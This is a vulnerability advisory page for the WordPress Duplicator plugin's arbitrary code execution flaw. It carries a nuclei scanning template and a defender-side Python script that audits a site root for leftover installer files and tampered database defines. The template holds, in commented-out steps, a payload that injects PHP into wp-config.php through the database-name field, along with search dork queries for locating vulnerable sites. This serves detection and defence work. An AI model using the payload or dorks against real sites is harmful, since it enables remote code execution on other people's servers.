An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
PoC code [public]
id: CVE-2018-17207

info:
  name: WordPress Duplicator Plugin < 1.2.42 - Arbitrary Code Execution
  author: synacktiv,iamnoooob,pdresearch
  severity: critical
  description: |
    An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
  reference:
    - https://www.synacktiv.com/posts/exploit/wordpress-duplicator-plugin-arbitrary-code-execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17207
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-17207
    cwe-id: CWE-94
    epss-score: 0.87527
    epss-percentile: 0.99428
    cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
  metadata:
    vendor: snapcreek
    product: duplicator
    framework: wordpress
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/duplicator"
    google-query: inurl:"/wp-content/plugins/duplicator"
  tags: cve,cve2018,wordpress,duplicator,rce

# Uncomment to attempt RCE, but note that it modifies database details, potentially causing the website to not function properly.
# variables:
#   marker: "{{randstr}}"

http:
  - raw:
      - |
        POST /installer-backup.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action_step=1

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "Plugin Version:.*?([0-9].*?)<"
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>Duplicator</title>'
          - 'dupx-header-version'
          - 'Deployment Path:'
        condition: and

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - compare_versions(version, '< 1.2.42')

  # - raw:
  #     - |-
  #       POST /installer-backup.php HTTP/1.1
  #       Host: {{Hostname}}
  #       Content-Type: application/x-www-form-urlencoded
  #       Connection: close
  #
  #       action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=wordpress');echo base64_decode($_GET["input"]);//&dbport=12345&
  #
  #   matchers-condition: and
  #   matchers:
  #     - type: word
  #       part: body
  #       words:
  #         - updt_rows
  #         - scan_rows
  #         - scan_tables
  #       condition: and
  #
  #     - type: status
  #       status:
  #         - 200
  #   internal: true
  #
  # - raw:
  #     - |+
  #       GET /wp-config.php?input={{base64(marker)}} HTTP/1.1
  #       Host: {{Hostname}}
  #       Connection: close
  #
  #   matchers-condition: and
  #   matchers:
  #     - type: word
  #       part: body
  #       words:
  #         - '{{marker}}'
  #
  #     - type: status
  #       status:
  #         - 200
# digest: 4a0a00473045022100c3f903090bfbea2d67a45b6a39cd51a76efe9326daf906810841fe8fadd706d7022010a687d539b5afd33b9230708013346ccace9ec725181343e85b96658e5ef83e:922c64590222798bb761d5b6d8e72950
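As an added defender-side example (not part of the nuclei template above and not code from the Duplicator plugin), the script below audits a WordPress document root for the two conditions the description depends on: leftover installer.php / installer-backup.php files in the site root, and DB_* define() lines in wp-config.php that no longer form a single quoted string literal, which is what an injected database-setup value leaves behind. The "clean define" regular expression, the DB_* key list and the sample site it builds in a temporary directory are constructed assumptions for this example, not taken from WordPress or the plugin.

```python
import os
import re
import tempfile

# Leftover files named in the advisory. Duplicator drops them in the site
# root, so that is where this check looks (assumption for this example).
LEFTOVER_INSTALLER_FILES = ("installer.php", "installer-backup.php")

# A define() the way a WordPress installer writes it: single-quoted key,
# single-quoted value (backslash escapes allowed), then ");" and nothing
# else on the line. Anything trailing the call is treated as suspicious.
CLEAN_DB_DEFINE = re.compile(
    r"^\s*define\(\s*'(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)'\s*,\s*"
    r"'(?:[^'\\]|\\.)*'\s*\)\s*;\s*$"
)
ANY_DB_DEFINE = re.compile(r"define\(\s*'(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)'")


def find_leftover_installers(docroot):
    """Paths of Duplicator installer files still present in the site root."""
    return [
        os.path.join(docroot, name)
        for name in LEFTOVER_INSTALLER_FILES
        if os.path.isfile(os.path.join(docroot, name))
    ]


def suspicious_db_defines(wp_config_text):
    """(key, line) pairs for DB_* defines that are not one plain literal.

    A value that closes the quote and the define() call early leaves extra
    PHP on the same line; that is the shape the injection described on this
    page produces, so the check is independent of any particular payload.
    """
    flagged = []
    for line in wp_config_text.splitlines():
        m = ANY_DB_DEFINE.search(line)
        if m and not CLEAN_DB_DEFINE.match(line):
            flagged.append((m.group(1), line.strip()))
    return flagged


def audit_wordpress_root(docroot):
    """Run both checks and return a dict a monitoring job can alert on."""
    report = {
        "leftover_installers": find_leftover_installers(docroot),
        "suspicious_defines": [],
    }
    cfg = os.path.join(docroot, "wp-config.php")
    if os.path.isfile(cfg):
        with open(cfg, encoding="utf-8", errors="replace") as fh:
            report["suspicious_defines"] = suspicious_db_defines(fh.read())
    return report


def build_sample_docroot():
    """Constructed sample site: one leftover installer and one tampered define."""
    docroot = tempfile.mkdtemp(prefix="wp-audit-")
    with open(os.path.join(docroot, "installer-backup.php"), "w") as fh:
        fh.write("<?php // constructed stand-in for a leftover installer\n")
    with open(os.path.join(docroot, "wp-config.php"), "w") as fh:
        fh.write(
            "<?php\n"
            "define('DB_NAME', 'wordpress');\n"        # clean
            "define('DB_USER', 'wp_user');\n"          # clean
            "define('DB_PASSWORD', 'p\\'ss');\n"       # clean, escaped quote
            # constructed tampered line: value closes the call early and
            # leaves trailing PHP, the pattern the audit is meant to catch
            "define('DB_HOST', 'localhost');echo 'injected';//');\n"
        )
    return docroot


if __name__ == "__main__":
    print(audit_wordpress_root(build_sample_docroot()))
```

Run as a script it prints the report for the constructed sample; point `audit_wordpress_root` at a real site root to use it as a post-migration check or a scheduled job. A non-empty `leftover_installers` list is the condition the first request in the template probes for over HTTP, and a non-empty `suspicious_defines` list is the evidence the commented-out steps would leave behind; removing the installer files after migration and upgrading to 1.2.42 or later address the first, while a flagged define warrants restoring wp-config.php from a known-good copy.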